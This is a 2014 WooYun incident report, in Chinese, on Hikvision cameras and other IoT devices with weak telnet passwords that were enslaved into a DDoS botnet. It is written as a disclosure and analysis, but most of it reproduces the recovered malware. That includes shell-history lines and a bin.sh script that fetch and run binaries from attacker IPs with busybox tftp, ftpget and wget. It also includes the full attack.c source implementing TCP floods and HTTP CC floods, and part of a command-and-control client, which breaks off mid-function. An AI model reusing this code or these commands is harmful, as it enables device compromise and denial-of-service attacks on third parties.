海康威视等监控和物联网设备被用于僵尸网络的实例

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-087132

漏洞标题：海康威视等监控和物联网设备被用于僵尸网络的实例

漏洞作者：路人甲

提交时间：2014-12-14 17:51

修复时间：2015-03-14 17:52

公开时间：2015-03-14 17:52

漏洞类型：地下0day/成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-14：细节已通知厂商并且等待厂商处理中
2014-12-17：厂商已经确认，细节仅向厂商公开
2014-12-20：细节向第三方安全合作伙伴开放
2015-02-10：细节向核心白帽子及相关领域专家公开
2015-02-20：细节向普通白帽子公开
2015-03-02：细节向实习白帽子公开
2015-03-14：细节向公众公开

简要描述：

监控设备等物联网设备僵尸网络的实例
硬件范围
davinci、ralink、rtl8196c、ar5315、faraday、arm_hi
以mips 与 arm 为主大多数终端，监控，路由，以及其他互联网设备

详细说明：

找台存在telnet弱口令的hikvision的设备 cat .ash_history

# cat .ash_history
echo $?K_O_S_T_Y_P_E
echo CMDBEGIN ; ls -l /proc/self/exe ; echo CMDEND
echo CMDBEGIN ; cat /proc//\cpuinfo ; echo CMDEND
echo CMDBEGIN ; cd /dev;rm -rf 0915.davinci ; echo CMDEND
echo CMDBEGIN ; rm -rf 123;umount -l /etc ; echo CMDEND
echo CMDBEGIN ; rm -rf 123;umount -l /var ; echo CMDEND
echo CMDBEGIN ; cd ..;cd var;busybox tft1p -g -r 1.sh 121.199.10.66;chmod 777 *;./12.sh &: ; echo CMDEND
############################################
############################################
echo CMDBEGIN ; cd /home;busybox ftpget -u 886 -p 886 61.147.107.94 0923.davinci 0923.davinci;chmod 777 *;./0923.davinci ; echo CMDEND
echo CMDBEGIN ; busybox echo 123 ; echo CMDEND
################################################
################################################
echo CMDBEGIN ; cd /mnt;busybox tftp -g -r /s/0923.8196 123.56.86.13;chmod 777 *;./0923.8196 ; echo CMDEND
###############################################
###############################################
echo CMDBEGIN ; busybox echo 123 ; echo CMDEND
echo CMDBEGIN ; busybox cd /etc;mount1 -v -o soft,async,intr,udp,nolock,rsize=1024,wsize=1024 121.199.10.66:/s /etc;cd /etc;./0923.davinci;umount -l /etc ; echo CMDEND
echo CMDBEGIN ; busybox echo 123 ; echo CMDEND
echo CMDBEGIN ; cd /etc;./0916.davinci;./socket5_rdlink;umount -l /etc &: ; echo CMDEND
###############################################
###############################################
echo CMDBEGIN ; mkdir www2;umount -l /etc ; echo CMDEND
echo CMDBEGIN ; busybox wg1et http://211.155.226.20:8080/socket5_davinci;chmod 777 *;./socket5_davinci ; echo CMDEND
###############################################
###############################################
echo CMDBEGIN ; busybox t1ftp -g -r socket5_rdlink 121.199.10.66;chmod 777 *;./socket51_rdlink ; echo CMDEND
###############################################
###############################################

从代码来看。实际上这台机器已经被抡了好几次了。。。每个分割符间一次。。。
由于busybox 的 telnetd 不带日志。登录情况是未知的。
其中大多数ip挂了
少数还是可以下载到其文件的
其中用ftp的被整个当下来了

职业大黑阔。。用linux集群做ddos的吧。。。
其实阉割的busybox是没有wget的，用wget的是想闹哪样啊。而且各位阔用的文件名如此相似。明显是流出来的

漏洞证明：

从下载的ftp上看其中shell主要有bin.sh 与 download.sh 其他几个shell都是未完成品
对download.sh的分析

#!/bin/sh
while read LINE
do
HARDWARE_LEN=${#LINE}
RTL8196_HARDWARE=${LINE/"RTL8196C"/}
RTL8196_HARDWARE_LEN=${#RTL8196_HARDWARE}
if [ "$RTL8196_HARDWARE_LEN" != "$HARDWARE_LEN"  ]; then
   echo "this is rtl8196c" 
   #do something
   exit 0
fi
DAVINCI_HARDWARE=${LINE/"DaVinci"/}
DAVINCI_HARDWARE_LEN=${#DAVINCI_HARDWARE}
if [ "$DAVINCI_HARDWARE_LEN" != "$HARDWARE_LEN"  ]; then
   echo "this is davinci" 
   #do something
   exit 0
fi
RDLINK_HARDWARE=${LINE/"Ralink"/}
RDLINK_HARDWARE_LEN=${#RDLINK_HARDWARE}
if [ "$RDLINK_HARDWARE_LEN" != "$HARDWARE_LEN"  ]; then
   echo "this is ralink"
   #do something
   exit 0
fi
AR_HARDWARE=${LINE/"AR5315"/}
AR_HARDWARE_LEN=${#AR_HARDWARE}
if [ "$AR_HARDWARE_LEN" != "$HARDWARE_LEN"  ]; then
   echo "this is ar5315"
   #do something
   exit 0
fi
FARADAY_HARDWARE=${LINE/"Faraday"/}
FARADAY_HARDWARE_LEN=${#FARADAY_HARDWARE}
if [ "$FARADAY_HARDWARE_LEN" != "$HARDWARE_LEN"  ]; then
   echo "this is faraday"
   #do something
   exit 0
fi
HI_HARDWARE=${LINE/"ARM"/}
HI_HARDWARE_LEN=${#HI_HARDWARE}
if [ "$HI_HARDWARE_LEN" != "$HARDWARE_LEN"  ]; then
   echo "this is arm_hi"
   #do something
   exit 0
fi
done</proc/cpuinfo

是一个判断硬件类型的
hikvision是基于davinci的可见。硬件支持是非常广泛的
对 bin.sh 的分析

#!/bin/sh
cd /tmp/
rm -rf *
sleep 3;
killall telnetx
killall mips
killall mipsel
killall arm
killall ppc
killall arm7
killall superh
killall i586
killall i686
#sleep 3;
busybox tftp -r mips -g 93.174.93.52; cp /bin/busybox ./; cat mips > busybox; rm mips; cp busybox telnetx; rm busybox;  ./telnetx; rm telnetx
busybox tftp -r mipsel -g 93.174.93.52; cp /bin/busybox ./; cat mipsel > busybox; rm mipsel; cp busybox telnetx; rm busybox;  ./telnetx; rm telnetx
busybox tftp -r arm -g 93.174.93.52; cp /bin/busybox ./; cat arm > busybox; rm arm; cp busybox telnetx; rm busybox;  ./telnetx; rm telnetx
busybox tftp -r arm7 -g 93.174.93.52; cp /bin/busybox ./; cat arm7 > busybox; rm arm7; cp busybox telnetx; rm busybox;  ./telnetx; rm telnetx
busybox tftp -r ppc -g 93.174.93.52; cp /bin/busybox ./; cat ppc > busybox; rm ppc; cp busybox telnetx; rm busybox;  ./telnetx; rm telnetx
busybox tftp -r superh -g 93.174.93.52; cp /bin/busybox ./; cat superh > busybox; rm superh; cp busybox telnetx; rm busybox;  ./telnetx;rm telnetx
busybox tftp -r i586 -g 93.174.93.52; cp /bin/busybox ./; cat i586 > busybox; rm i586; cp busybox telnetx; rm busybox;  ./telnetx; rm telnetx
busybox tftp -r i686 -g 93.174.93.52; cp /bin/busybox ./; cat i686 > busybox; rm i686; cp busybox telnetx; rm busybox;  ./telnetx; rm telnetx
busybox tftp -r sparc -g 93.174.93.52; cp /bin/busybox ./; cat sparc > busybox; rm sparc; cp busybox telnetx; rm busybox;  ./telnetx;rm telnetx
#sleep 3;
rm -rf *
#sleep 15;
#iptables -A INPUT -p tcp -d 10.0.0.0/8 –dport 23 -j ACCEPT
#iptables -A INPUT -p tcp -d 10.0.0.0/8 –dport 80 -j ACCEPT
#iptables -A INPUT -p tcp -d 127.0.0.0/8 –dport 23 -j ACCEPT
#iptables -A INPUT -p tcp -d 127.0.0.0/8 –dport 80 -j ACCEPT
#iptables -A INPUT -p tcp -d 192.168.0.0/16 –dport 23 -j ACCEPT
#iptables -A INPUT -p tcp -d 192.168.0.0/16 –dport 80 -j ACCEPT
#iptables -A INPUT -p tcp –dport 23 -j DROP
#iptables -A INPUT -p tcp –dport 80 -j DROP

从上面来看是对下载各种硬件的shell
好吧。其实我不确定是不是shell。。应为

从文件名看书sock5代理
TAT
对其他文件分析主要是上图中的压缩包
其中在code压缩包中发现了

/* * =====================================================================================
 *
 *       Filename:  test.c
 *
 *    Description:  
 *
 *        Version:  1.0
 *        Created:  2014年06月20日 21时34分11秒
 *       Revision:  none
 *       Compiler:  gcc
 *
 *         Author:  YOUR NAME (), 
 *        Company:  
 *
 * =====================================================================================
 */

其次在attack.c的源码中证明其用于ddos

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <signal.h>
//#include <pthread.h>
#include "common.h"
#include "attack.h"
#define MAX_PATH 512
typedef int SOCKET;
static int getrandom(int min, int max)
{
    if (min == max)
    {
        return min;
    }
    srand(time(NULL));
    int seed = rand() + 3;
    return seed % (max - min + 1) + min;
}
static int onerandom(int count)
{
    unsigned long now = (unsigned long)time(NULL);
    int seed = rand() + 3;
    return (seed * now) % count;
}
static unsigned long resolve(char *host)
{
    unsigned long i = 0;
    char ip[32];
    struct in_addr addr;
    if (!resolve_ip(host, ip))
        return 0;
    inet_aton(ip, &addr);
    return *(unsigned long *)&addr;
}
int tcpConnect(char *host, int port)
{
    int sock;
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(sock == -1)
        return sock;
    struct sockaddr_in sin;
    unsigned long ip = resolve(host);
    if(ip == 0)
        ip = inet_addr(host);
    sin.sin_addr.s_addr = ip;
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1)
    {
        close(sock);
        return -1;
    }
    return sock; 
}
// TCP Flood
static int TcpDataFlood(void *param)
{
	pid_t pid;
    COMMAND *cmd = (COMMAND *)param;
    int sockfd;
    struct sockaddr_in servaddr;
    char *buffer;
	pid = fork();
    if (pid > 0)
    {
        return pid; // 父进程返回
    }
    else if (pid < 0)
    {
        return -1;
    }
	
    if ((buffer = malloc(1024)) == NULL)
    {
        DEBUG(DEBUG_FATAL,"!! memory out\n");
        return -1;
    }
    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = resolve(cmd->target);
    servaddr.sin_port = htons(cmd->port);
    sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sockfd < 0)
    {
        DEBUG(DEBUG_FATAL,"!! create socket failed\n");
        free(buffer);
        return -1;
    }
    if (connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0)
    {
        DEBUG(DEBUG_FATAL,"!! connect server failed\n");
        free(buffer);
        close(sockfd);
        return -1;
    }
    memset(buffer, getrandom(0, 255), 1024);
    while (1)
    {
        send(sockfd, buffer, 1024, MSG_NOSIGNAL);
        usleep(1000 * cmd->delay);
    }
    free(buffer);
    close(sockfd);
    exit(0);;
}
// TCP并发
static int TcpMultiConnect(void *param)
{
    COMMAND *cmd = (COMMAND *)param;
    int sockfd;
    struct sockaddr_in servaddr;
	pid_t pid; 
	
	pid = fork();
	if (pid > 0)
	{
		return pid; // 父进程返回
	}
	else if (pid < 0)
	{
		return -1;
	}
	
    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = resolve(cmd->target);
    servaddr.sin_port = htons(cmd->port);
    while (1)
    {
        sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr));
        usleep(1000 * 10);
        close(sockfd);
    }
    exit(0);;
}
// TCP畸形连接
static int TcpCatFace(void *param)
{
    COMMAND *cmd = (COMMAND *)param;
    int sockfd;
    struct sockaddr_in servaddr;
    char *buffer;
	pid_t pid; 
	
	pid = fork();
	if (pid > 0)
	{
		return pid; // 父进程返回
	}
	else if (pid < 0)
	{
		return  -1;
	}
    if ((buffer = malloc(2048)) == NULL)
    {
        DEBUG(DEBUG_FATAL,"!! memory out\n");
        return -1;
    }
    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = resolve(cmd->target);
    servaddr.sin_port = htons(cmd->port);
    sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sockfd < 0)
    {
        DEBUG(DEBUG_FATAL,"!! create socket failed\n");
        free(buffer);
        return -1;
    }
    if (connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0)
    {
        DEBUG(DEBUG_FATAL,"!! connect server failed\n");
        free(buffer);
        close(sockfd);
        return -1;
    }
    memset(buffer, 'a' + onerandom(26), 1024 + onerandom(1024));
    while (1)
    {
        send(sockfd, buffer, 2048, MSG_NOSIGNAL);
        usleep(1000 * 10);
    }
    free(buffer);
    close(sockfd);
    exit(0);;
}
// Http Get协议
static int WebGetFull(void *param)
{
    COMMAND *cmd = (COMMAND *)param;
    char *ptr;
    char *tIP, *zIP, *ctsz, *strTrueDNS;
    char *url, *http, *rhost;
    int sockfd;
	pid_t pid; 
	
	pid = fork();
	if (pid > 0)
	{
		return pid; // 父进程返回
	}
	else if (pid < 0)
	{
		return  -1;
	}
    tIP = malloc(MAX_PATH);
    zIP = malloc(MAX_PATH);
    ctsz = malloc(MAX_PATH);
    strTrueDNS = malloc(MAX_PATH);
    url = malloc(MAX_PATH * 4);
    http = malloc(MAX_PATH);
    rhost = malloc(MAX_PATH);
    if (!tIP || !zIP || !ctsz || !strTrueDNS || !url || !http || !rhost)
    {
        DEBUG(DEBUG_FATAL,"!! memory out\n");
        goto cleanup;
    }
    memset(tIP, 0, MAX_PATH);
    memset(zIP, 0, MAX_PATH);
    memset(ctsz, 0, MAX_PATH);
    memset(strTrueDNS, 0, MAX_PATH);
    memset(url, 0, MAX_PATH * 4);
    memset(http, 0, MAX_PATH);
    memset(rhost, 0, MAX_PATH);
    strcpy(tIP, cmd->target + 7);
    strcpy(zIP, tIP);
    ptr = strchr(zIP, '/');
    if (ptr == NULL)
    {
        DEBUG(DEBUG_FATAL,"!! invalid target address\n");
        goto cleanup;
    }
    memset(ptr, 0, strlen(ptr));
    strcpy(tIP, strchr(tIP, '/') + 1);
    strcpy(ctsz, tIP);
    if (inet_addr(zIP) == INADDR_NONE)
    {
        char ip[32];
        if (resolve_ip(zIP, ip))
        {
            strcpy(strTrueDNS, ip);
        }
        else
        {
            strcpy(strTrueDNS, zIP);
        }
    }
    else
    {
        strcpy(strTrueDNS, zIP);
    }
    strcpy(http, zIP);
    strcpy(rhost, http);
    strcpy(url, "GET ");
    strcat(url, ctsz);
    strcat(url, " HTTP/1.1\r\n");
    strcat(url, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\n");
    strcat(url, "Accept-Language: zh-cn\r\n");
    strcat(url, "Accept-Encoding: gzip, deflate");
    strcat(url, "\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
    strcat(url, "\r\nHost:");
    strcat(url, rhost);
    strcat(url, "\r\nConnection: Keep-Alive");
    strcat(url, "\r\n\r\n");
    while (1)
    {
        int S=tcpConnect(strTrueDNS,cmd->port);
        send(S,url,strlen(url) ,MSG_NOSIGNAL);
        close(S);
        usleep(1000*cmd->delay);
    }
cleanup:
    if (tIP) free(tIP);
    if (zIP) free(zIP);
    if (ctsz) free(ctsz);
    if (strTrueDNS) free(strTrueDNS);
    if (url) free(url);
    if (http) free(http);
    if (rhost) free(rhost);
    exit(0);;
}
// 变异CC压力测试
static int WebCCAttack(void *param)
{
    COMMAND *cmd = (COMMAND *)param;
    char ip[32],url[64],*point=NULL;
	pid_t pid; 
	
	pid = fork();
	if (pid > 0)
	{
		return pid; // 父进程返回
	}
	else if (pid < 0)
	{
		return  -1;
	}
	point=cmd->target;
    //http://
    char strHttp[]={0x68,  0x74,  0x74,  0x70,  0x3A,  0x2F,  0x2F,  0x00};
    if(strstr(cmd->target,strHttp)!=NULL)
    {
        point=point+strlen(strHttp);
    }
    if(strstr(point,"/")!=NULL)
    {
        memset(ip,0,sizeof(ip));
        strncpy(ip,point,strcspn(point,"/"));
        point=point+strcspn(point,"/");
        memset(url,0,sizeof(url));
        strcpy(url,point);
    }
    if (strlen(url)<2)
    {
        strcpy(url,"/");
    }
    struct sockaddr_in sockAddr;
    SOCKET  m_hSocket;
    memset(&sockAddr,0,sizeof(sockAddr));
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port=htons(cmd->port);
    sockAddr.sin_addr.s_addr=resolve(ip); 
    char header[MAX_PATH] = ""; 
    //Connection: Close
    char strConnection[]={0x43,  0x6F,  0x6E,  0x6E,  0x65,  0x63,  0x74,  0x69,  0x6F,  0x6E,  0x3A,  0x20,  0x43,  0x6C,  0x6F,  0x73,  0x65,  0x00};
    //Mozilla/5.0
    char strMozilla[]={0x4D,  0x6F,  0x7A,  0x69,  0x6C,  0x6C,  0x61,  0x2F,  0x35,  0x2E,  0x30,  0x00};
    //Host:
    char strHost[]={0x48,  0x6F,  0x73,  0x74,  0x3A,  0x00};
    //Connection:
    char strCon[]={0x43,  0x6F,  0x6E,  0x6E,  0x65,  0x63,  0x74,  0x69,  0x6F,  0x6E,  0x3A,  0x00};
    if (cmd->port == 80 )
    {
        sprintf(header,
            "GET %s HTTP/1.1\r\n"
            "%s %s\r\n"
            "User-Agent: %s (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15"
            "Cache-Control: no-store, must-revalidate\r\n"
            "Referer: %s%s\r\n"
            "%s keep-alive\r\n\r\n",
            url,
            strHost,
            ip,
            strMozilla,
            strHttp,
            ip,strCon);
    }
    else
    {
        sprintf(header, 
            "GET %s HTTP/1.1\r\n"
            "%s %s:%d\r\n"
            "User-Agent: %s (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15"
            "Cache-Control: no-store, must-revalidate\r\n"
            "Referer: //%s\r\n"
            "%s\r\n\r\n",
            url,
            strHost,
            ip,
            cmd->port,
            strMozilla,
            strHttp,
            ip,strConnection);
    }
    while(1)
    {
        m_hSocket =socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(m_hSocket,(struct sockaddr *)&sockAddr,sizeof(struct sockaddr_in)); 
        send(m_hSocket, header, strlen(header), MSG_NOSIGNAL);
        close(m_hSocket); 
        usleep(1000*cmd->delay);
    }
    exit(0);;
}
// 无限CC压力测试
static int WebInfinitudeCC(void *param)
{
    COMMAND *cmd = (COMMAND *)param;
    char *url, *http, *rhost;
    char *FuckIP = cmd->target;
    int FuckPort = cmd->port;
	pid_t pid; 
	
	pid = fork();
	if (pid > 0)
	{
		return pid; // 父进程返回
	}
	else if (pid < 0)
	{
		return -1;
	}
    url = malloc(MAX_PATH * 4);
    http = malloc(MAX_PATH);
    rhost = malloc(MAX_PATH);
    if (!url || !http || !rhost)
    {
        DEBUG(DEBUG_FATAL,"!! memory out\n");
        goto cleanup;
    }
    memset(url, 0, MAX_PATH*4);
    memset(http, 0,MAX_PATH);
    memset(rhost, 0,MAX_PATH);
    strcpy(http,FuckIP);
    strcpy(rhost,http);
    //char *jj = "/";
    char jj[2] = {'/', '\0'};
    strcpy(url,"GET ");
    strcat(url,jj);
    strcat(url," HTTP/1.1\r\n");
    strcat(url,"Content-Type: text/html");
    strcat(url,"\r\nHost: ");
    strcat(url,rhost);
    strcat(url,"\r\nAccept: text/html, */*");
    strcat(url,"\r\nUser-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)");
    strcat(url,"\r\n\r\n");;
    while (1)
    {
        SOCKET S=tcpConnect(FuckIP,FuckPort);
        send(S,url,strlen(url) ,MSG_NOSIGNAL);
        //close(S);
        usleep(1000*cmd->delay);
    }
cleanup:
    if (url) free(url);
    if (http) free(http);
    if (rhost) free(rhost);
	exit(0);
}
// 分布循环式CC
static int WebSpiderCC(void *param)
{
    COMMAND *cmd = (COMMAND *)param;
    char ip[32],url[100],*point=NULL, *FuckIP=cmd->target;
    point=FuckIP;
    int FuckPort = cmd->port;
    int iBenginParam = cmd->var1;
    int iEndParam = cmd->var2;
	pid_t pid; 
	
	pid = fork();
	if (pid > 0)
	{
		return pid; // 父进程返回
	}
	else if (pid < 0)
	{
		return -11;
	}
    //http://
    char strHttp[]={0x68,  0x74,  0x74,  0x70,  0x3A,  0x2F,  0x2F,  0x00};
    if(strstr(FuckIP,strHttp)!=NULL)
    {
        point=point+strlen(strHttp);
    }
    if(strstr(point,"/")!=NULL)
    {
        memset(ip,0,sizeof(ip));
        strncpy(ip,point,strcspn(point,"/"));
        point=point+strcspn(point,"/");
        memset(url,0,sizeof(url));
        strcpy(url,point);
    }
    if (strlen(url)<2)
    {
        strcpy(url,"/");
    }
    struct sockaddr_in sockAddr;
    SOCKET  m_hSocket;
    memset(&sockAddr,0,sizeof(sockAddr));
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port=htons(FuckPort);
    sockAddr.sin_addr.s_addr=resolve(ip); 
    char header[MAX_PATH] = ""; 
    char szUrlchg[100];
    int  iParam = iBenginParam;
    //Connection: Close
    char strConnection[]={0x43,  0x6F,  0x6E,  0x6E,  0x65,  0x63,  0x74,  0x69,  0x6F,  0x6E,  0x3A,  0x20,  0x43,  0x6C,  0x6F,  0x73,  0x65,  0x00};
    //Mozilla/5.0
    char strMozilla[]={0x4D,  0x6F,  0x7A,  0x69,  0x6C,  0x6C,  0x61,  0x2F,  0x35,  0x2E,  0x30,  0x00};
    //Host:
    char strHost[]={0x48,  0x6F,  0x73,  0x74,  0x3A,  0x00};
    while(1)
    {
        sprintf(szUrlchg,url,iParam);
        iParam++;
        if(iParam > iEndParam)
            iParam = iBenginParam;
        if (FuckPort == 80 )
        {
            sprintf(header,
                "GET %s HTTP/1.1\r\n"
                "%s %s\r\n"
                "Cache-Control: no-store, must-revalidate\r\n"
                "Referer: %s%s\r\n"
                "%s\r\n\r\n",
                szUrlchg,
                strHost,
                strHttp,
                ip,
                ip,strConnection);
        }
        else
        {
            sprintf(header, 
                "GET %s HTTP/1.1\r\n"
                "%s %s:%d\r\n"
                "User-Agent: %s (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.15) Gecko/2009101601 Firefox/3.0.15"
                "Cache-Control: no-store, must-revalidate\r\n"
                "Referer: %s%s\r\n"
                "%s\r\n\r\n",
                szUrlchg,
                strHost,
                ip,
                FuckPort,strMozilla,strHttp,
                ip,strConnection);
        }
        m_hSocket =socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(m_hSocket,(struct sockaddr *)&sockAddr,sizeof(struct sockaddr_in)); 
        send(m_hSocket, header, strlen(header), MSG_NOSIGNAL);
        close(m_hSocket); 
        usleep(1000*cmd->delay);
    }
    exit(0);;
}
void start_attack(COMMAND *cmd, int *pid, int *pid_cnt)
{ 
    //pthread_t pt;
    int i;
	int ret = -1;
	pid = malloc(sizeof(int) * cmd->thread);
	if(pid == NULL)
	{
		DEBUG(DEBUG_FATAL, "malloc is error\n");
		return;
	}
	*pid_cnt = cmd->thread;
		
    switch (cmd->type)
    {
    case CMD_TCP_FLOOD:
        DEBUG(DEBUG_FATAL,"start %d threads TcpDataFlood attack\n", cmd->thread);
        for (i = 0; i < cmd->thread; i++)
        {
            //pthread_create(&pt, NULL, TcpDataFlood, cmd);
           
			ret = TcpDataFlood(cmd);
			if(ret >= 0)
			{
				 pid[i] = ret;
			}
		}
        break;
    case CMD_TCP_MULTI_CONNECT:
        DEBUG(DEBUG_FATAL,"start %d threads TcpMultiConnect attack\n", cmd->thread);
        for (i = 0; i < cmd->thread; i++)
        {
            //pthread_create(&pt, NULL, TcpMultiConnect, cmd);
			ret = TcpMultiConnect(cmd);
			if(ret >= 0)
			{
				 pid[i] = ret;
			}
		}
        break;
    case CMD_TCP_CAT_FACE:
        DEBUG(DEBUG_FATAL,"start %d threads TcpCatFace attack\n", cmd->thread);
        for (i = 0; i < cmd->thread; i++)
        {
            //pthread_create(&pt, NULL, TcpCatFace, cmd);
			ret = TcpCatFace(cmd);
			if(ret >= 0)
			{
				 pid[i] = ret;
			}
		}
        break;
    case CMD_WEB_GET_FULL:
        DEBUG(DEBUG_FATAL,"start %d threads WebGetFull attack\n", cmd->thread);
        for (i = 0; i < cmd->thread; i++)
        {
            //pthread_create(&pt, NULL, WebGetFull, cmd);
			ret = WebGetFull(cmd);
			if(ret >= 0)
			{
				 pid[i] = ret;
			}
		}
        break;
    case CMD_WEB_CAT_FACE:
        DEBUG(DEBUG_FATAL,"start %d threads WebCCAttack attack\n", cmd->thread);
        for (i = 0; i < cmd->thread; i++)
        {
            //pthread_create(&pt, NULL, WebCCAttack, cmd);
			ret = WebCCAttack(cmd);
			if(ret >= 0)
			{
				 pid[i] = ret;
			}
		}
        break;
    case CMD_WEB_INFINITUDE:
        DEBUG(DEBUG_FATAL,"start %d threads WebInfinitudeCC attack\n", cmd->thread);
        for (i = 0; i < cmd->thread; i++)
        {
            //pthread_create(&pt, NULL, WebInfinitudeCC, cmd);
			ret = WebInfinitudeCC(cmd);
			if(ret >= 0)
			{
				 pid[i] = ret;
			}
		}
        break;
    case CMD_WEB_SPIDER:
        DEBUG(DEBUG_FATAL,"start %d threads WebSpiderCC attack\n", cmd->thread);
        for (i = 0; i < cmd->thread; i++)
        {
            //pthread_create(&pt, NULL, WebSpiderCC, cmd);
			ret = WebSpiderCC(cmd);
			if(ret >= 0)
			{
				 pid[i] = ret;
			}
		}
        break;
    default:
        DEBUG(DEBUG_FATAL,"unsupported attack command!\n");
        break;
    }
}
void stop_attack(int *pid, int pid_cnt)
{
	int i = 0;
	for(i = 0; i < pid_cnt; i++)
	{
		 kill(pid[i], SIGKILL);
	}
}

以及控制代码和有趣的东西 http://wap.ip138.com/ip_search138.asp?ip=115.183.160.20 HTTP/1.1\r\n"

#include <stdio.h> 
#include <netinet/in.h> 
#include <netdb.h> 
#include <sys/time.h> 
#include <sys/types.h> 
#include <unistd.h> 
#include <stdlib.h> 
#include <signal.h> 
#include <pthread.h> 
#include <errno.h> 
#include <string.h> 
#include <sys/socket.h> 
#include <arpa/inet.h> 
#include <sys/wait.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <fcntl.h>
//#include <ifaddrs.h>
#include "common.h"
#include "sysCmdClient.h"
#include "resolve.h"
#include "socket5.h"
static sysClientInfo g_sysClientInfo = {};
int checkSysConnect(int sock)
{
    int ret = -1;
    struct timeval timeout;
    fd_set readfd;
    timeout.tv_sec = 10;
    timeout.tv_usec = 0;
    FD_ZERO(&readfd);
    FD_SET(sock, &readfd);
    ret = select(sock +1, NULL, &readfd, NULL, &timeout); 
    if(ret < 0)
    {
        return -1;
    }
    else if( ret == 0)
    {
        return -1; 
    }
    if(FD_ISSET(sock, &readfd))
    {
        int err = 0; 
        socklen_t len = sizeof(err);
        if(getsockopt(sock, SOL_SOCKET, SO_ERROR, &err, &len) < 0)
        {
            return -1; 
        }
        else if( err != 0)
        {
            return -1; 
        }
        else
        {
            return 0; 
        }
    
    }
    
    return -1;
}
int sendSysCmdReq(void)
{
	int ret = -1;
	int sock = -1;
	int nSend = 0, nRecv = 0;
	struct sockaddr_in addrCenter;
	SYS_CMD_HEAD sysCmdReqHead = {};
	SYS_CMD_REQ_BODY_EX sysCmdReqBody = {};
	SYS_CMD_HEAD sysCmdResHead = {};
	SYS_CMD_RES_BODY sysCmdResBody = {};
	int optval = 1;
	int CenterPort = 0;
	char ip[32];
    int flag = 0;
	
	if(!g_sysClientInfo.init)
	{
		 DEBUG(DEBUG_FATAL,"g_sysClientInfo is not init\n");
		 return -1;
	}
	sysCmdReqHead.mark[0] =  MAGIC_NUM_1;
	sysCmdReqHead.mark[1] =  MAGIC_NUM_2_EX;
	sysCmdReqHead.version = SYS_CMD_VERSION;
	sysCmdReqHead.modId   =  -1;
	sysCmdReqHead.modType =  SYS_USER_REQ;
	sprintf(sysCmdReqBody.userActionEx.userPort,"%d", g_sysClientInfo.userPort);
	strcpy(sysCmdReqBody.userActionEx.userName, g_sysClientInfo.userName);
	strcpy(sysCmdReqBody.userActionEx.userPass, g_sysClientInfo.userPass);
	DEBUG(DEBUG_FATAL,"userPort is %s\n", sysCmdReqBody.userActionEx.userPort);	
	
	
	 /* 在初始化的时候如果ADMIND_NETUPLOAD_EINCREATESOCKET，在这里再次尝试创建 */
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
    {
        DEBUG(DEBUG_FATAL, "creat sock for upload failed !!!");
        ret = -1;
        goto EXIT0;
    }
    if((setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *)&optval,sizeof(int))) < 0) 
    {
        DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!");
        ret = -1;
        goto EXIT0;
    }
    
    /* set NOBLOCK */
    flag = fcntl(sock, F_GETFL, 0);
    fcntl(sock, F_SETFL, flag | O_NONBLOCK);
    /*设置超时
       */
     struct timeval timeout;
    timeout.tv_sec = 5;
    timeout.tv_usec = 0;
    if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, &timeout, sizeof (timeout)) < 0) 
    {
        DEBUG(DEBUG_FATAL, "setsockopt for upload failed !!!\n");
        ret = -1;
        goto EXIT0;
    }
    if (!resolve_ipEx(g_sysClientInfo.serverAddr, ip, SRV_ADDR))
    {
    	if(!resolve_ipEx(g_sysClientInfo.serverAddr, ip, SRV_ADDR_1))
    	{
    		DEBUG(DEBUG_FATAL, "can't get the resolve_ip \n");
			ret = -1;
        	goto EXIT0;
		}
       
    }
 
    bzero(&addrCenter, sizeof(struct sockaddr_in));
    addrCenter.sin_family = AF_INET;
    addrCenter.sin_port = htons(g_sysClientInfo.serverPort);
	inet_aton(ip, &addrCenter.sin_addr);
	
	 DEBUG(DEBUG_FATAL,"send request to %s\n", ip);
    //dbgPrint(TRACE, "alarmCenterIp=0x%x\n", htonl(pNetCfg->advance.nsAlertCfg.alertServerList[0].addr));
    
	ret =connect(sock,(struct sockaddr *)&addrCenter,sizeof(struct sockaddr));
	if(ret < 0 && errno == EINPROGRESS)
	{
